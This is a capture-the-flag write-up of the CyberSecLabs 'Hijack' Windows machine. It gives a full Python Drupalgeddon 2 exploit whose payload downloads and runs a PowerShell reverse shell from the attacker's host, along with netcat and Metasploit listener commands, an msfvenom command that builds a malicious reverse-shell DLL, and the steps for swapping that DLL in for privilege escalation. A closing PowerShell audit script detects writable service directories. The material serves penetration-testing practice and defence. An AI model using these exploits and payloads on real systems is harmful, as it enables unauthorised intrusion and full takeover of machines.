CyberSecLabs - Hijack

Software Sinner
5 min read · Sep 2, 2020

This is my 11th write-up, and I will be discussing my experience with the machine "Hijack" from CyberSecLabs. CyberSecLabs is a great platform for people who are starting out with penetration testing and want to sharpen their skills to take on the OSCP. Hijack was a fun Windows box; I learned how to perform DLL hijacking for the first time. A Drupalgeddon exploit lands you a user shell on the box, and from there a directory with write access opens up a DLL hijacking path that gains full admin.

Step 1: Enumeration

I started off with an Nmap scan on this machine to see what ports/versions were exposed and decided there was no need for a second scan type. It does not hurt to run two different types of Nmap scans, because one scan may give you more than the other. The only time I really run a second scan is when I am not finding anything exploitable from my first results. The scan used default scripts (-sC) and version detection (-sV).

I always start from top to bottom when reading the scan results, but in this case port 80 caught my attention, with the Drupal service/version exposed. I visited http://172.31.1.27 in my browser.

Step 2: Exploitation

I attempted some directory busting and did not find anything of interest, so I proceeded with some googling to see how I could exploit Drupal version 8 and came across a manual exploit somebody created. The exploit search had me running in circles for a while because there were mostly Unix-related exploits. This box is Windows, and that is key for getting a successful exploit. I made some minor changes to the exploit script in order for it to work for me.

#!/usr/bin/env python3
import sys
import requests

########################################################
# Simple Exploit for CVE 2018-7600 (Drupalgeddon 2)
# Usage: python3 drupalgeddon.py http://target-address
########################################################

target = sys.argv[1]

# Command run on the target: fetch the PowerShell reverse shell from my
# HTTP server and call back to my listener (replace youriphere with your IP)
command = '''powershell -c IEX (New-Object Net.WebClient).downloadstring('http://youriphere:8000/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress youriphere -Port 8081'''

# Vulnerable AJAX endpoint on the user registration form
url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'

payload = {
    'form_id': 'user_register_form',
    '_drupal_ajax': '1',
    'mail[#post_render][]': 'exec',
    'mail[#type]': 'markup',
    'mail[#markup]': command
}

print("Sending Payload...")
r = requests.post(url, data=payload)
print("Payload Sent.")

I changed the IP address placeholders in the Python script to match my Kali box. The next step was to follow exactly what the script is doing, and if you look closely, it needs to pull a PowerShell file onto the box along with sending the payload for the exploit. I googled the file the script wants to fetch, "Invoke-PowerShellTcp.ps1", and used wget to grab it and place it in the same directory the script resides in.

I needed to spawn a Python simple HTTP server to serve that file when the script runs, along with setting up a netcat listener, making sure all of this is done in the same directory where the Python exploit script resides.

On my Kali box, in the same directory as the Python exploit:

sudo python -m SimpleHTTPServer 8000

In another terminal window on the Kali box:

This will catch the reverse shell.

sudo nc -lvp 8081

In another Terminal Window:

This will kick off the exploit while the commands above are running in the background.

sudo python3 sinner.py http://172.31.1.27

Checking my netcat window, I had caught the reverse connection as user jack.

Step 3: Post Exploitation

The first thing I do the minute I land on a box is push some privilege escalation enumeration tools onto it and see what can lead me to admin. I love to use winPEAS for this, so I pushed it to the box using the same Python simple HTTP server method as in the commands above.

Looking at the winPEAS results, I noticed that DLL hijacking was possible in some directories, not to mention that the name of the box rang a bell. This had to be the way to admin. I kind of hate that they do that with some of these boxes; it's a dead giveaway!

winPEAS results

I had never performed a DLL hijacking attack before, so I definitely had to do some googling to exploit this successfully. The directory where this was possible was also another dead giveaway in the winPEAS results, because from my research on hijacking attacks, it has to do with processes being stopped and started.

It was time to craft a malicious DLL file with msfvenom to replace the one found in the directory C:\Program Files\Hijack\Libraries.

On my Kali Box:

msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=4444 -f dll > Custom.dll

It is super important that the file is named with the same filename as the .dll you found in C:\Program Files\Hijack\Libraries. That fools the service when it is started/stopped, giving you a reverse shell. After that, I needed to create a listener in Metasploit to grab the connection.

sudo msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST youriphere
set LPORT 4444
run

I pushed the Custom.dll file I created with msfvenom to the box with the Python simple HTTP server, placing it inside the \Libraries directory so that it replaced the existing Custom.dll with my evil one. I then needed to start the Hijack.exe service in order for it to reach out to the bad .dll file and the hijack to kick off.

net start hijack

Checking my Metasploit listener, I had hijacked the connection as full admin ;)
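As an added example that is not part of the original write-up or the CyberSecLabs box, here is the defender-side check for the condition that made this hijack possible: a PowerShell audit that lists every service whose binary directory is writable by low-privileged principals (the same weakness winPEAS flagged above). It assumes an elevated PowerShell session and approximates "low-privileged" with the groups in $WeakPrincipals.

```powershell
# Added audit example (not from the original write-up). Reports services whose
# binary lives in a directory that low-privileged principals can write to, which
# is the precondition for dropping a look-alike DLL next to the service binary.
# Assumption: the groups below are what we treat as "low-privileged".
$WeakPrincipals = @('Everyone', 'BUILTIN\Users',
                    'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Any of these rights lets a user create or replace files in the directory
$WriteMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'

function Get-WeakServiceDirectory {
    Get-CimInstance Win32_Service | ForEach-Object {
        $path = $_.PathName
        if (-not $path) { return }
        # Isolate the executable from a quoted or unquoted ImagePath
        if ($path -match '^"([^"]+)"')      { $exe = $Matches[1] }
        elseif ($path -match '^(.+?\.exe)') { $exe = $Matches[1] }
        else                                { $exe = $path.Split(' ')[0] }
        if (-not $exe) { return }
        $dir = Split-Path -Parent $exe
        if (-not $dir -or -not (Test-Path -LiteralPath $dir)) { return }
        $acl = Get-Acl -LiteralPath $dir -ErrorAction SilentlyContinue
        if (-not $acl) { return }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($WeakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (($ace.FileSystemRights -band $WriteMask) -eq 0) { continue }
            [pscustomobject]@{
                Service   = $_.Name
                RunsAs    = $_.StartName      # LocalSystem here means a full-admin hijack
                Directory = $dir
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

Get-WeakServiceDirectory | Format-Table -AutoSize
```

Every row it prints is a finding to remediate, for example by removing the write grant with icacls "<dir>" /remove:g "BUILTIN\Users" and leaving only Administrators and SYSTEM with modify rights on the service directory.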
